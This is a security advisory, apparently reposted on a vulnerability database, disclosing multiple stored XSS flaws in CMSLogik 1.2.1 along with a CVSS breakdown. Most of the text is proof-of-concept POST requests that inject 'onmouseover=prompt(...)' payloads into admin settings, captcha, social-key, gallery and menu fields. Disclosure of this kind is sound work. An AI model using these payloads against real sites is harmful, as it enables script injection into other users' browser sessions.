CMSLogik 1.2.1 Multiple Persistent XSS Vulnerabilities

2013-04-14 / 2013-05-17
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

CMSLogik 1.2.1 Multiple Persistent XSS Vulnerabilities Vendor: ThemeLogik Product web page: http://www.themelogik.com/cmslogik Affected version: 1.2.1 and 1.2.0 Summary: CMSLogik is built on a solid & lightweight framework called CodeIgniter, and design powered by Bootstrap. This combination allows for greater security, extensive flexibility, and ease of use. You can use CMSLogik for almost any niche that your project might fall into. Desc: CMSLogik suffers from multiple stored XSS vulnerabilities when parsing user input to several parameters via POST method. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user's browser session. Tested on: Apache/2.2.22 PHP/5.3.15 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2013-5136 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5136.php 05.04.2013 -- =========================================== POST http://localhost/cmslogik/admin/settings HTTP/1.1 admin_email "onmouseover=prompt("XSS1")> default_level 2 default_page 1 default_url http://themelogik.com/cmslogik/ email_activate 0 header_title "onmouseover=prompt("XSS2")> login 1 registration 1 site_title "onmouseover=prompt("XSS3")> update_settings Update Settings welcome_email 0 =========================================== POST http://localhost/cmslogik/admin/captcha_settings HTTP/1.1 captcha_settings Update recaptcha_private "onmouseover=prompt("XSS4")> recaptcha_public "onmouseover=prompt("XSS5")> =========================================== POST http://localhost/cmslogik/admin/social_settings HTTP/1.1 fb_appid "onmouseover=prompt("XSS6")> fb_secret "onmouseover=prompt("XSS7")> social_settings Update tw_consumer_key "onmouseover=prompt("XSS8")> tw_consumer_secret "onmouseover=prompt("XSS9")> ========================================= POST http://localhost/cmslogik/admin/gallery/save_item_settings HTTP/1.1 imgid 76 long test short test slug "onmouseover=prompt("XSS10")> status live title test ========================================= POST http://localhost/cmslogik/admin/edit_menu_item_ajax HTTP/1.1 item_link "onmouseover=prompt("XSS11")> item_name test item_order 0 mid 9 =========================================

References:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5136.php
http://www.themelogik.com/cmslogik


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top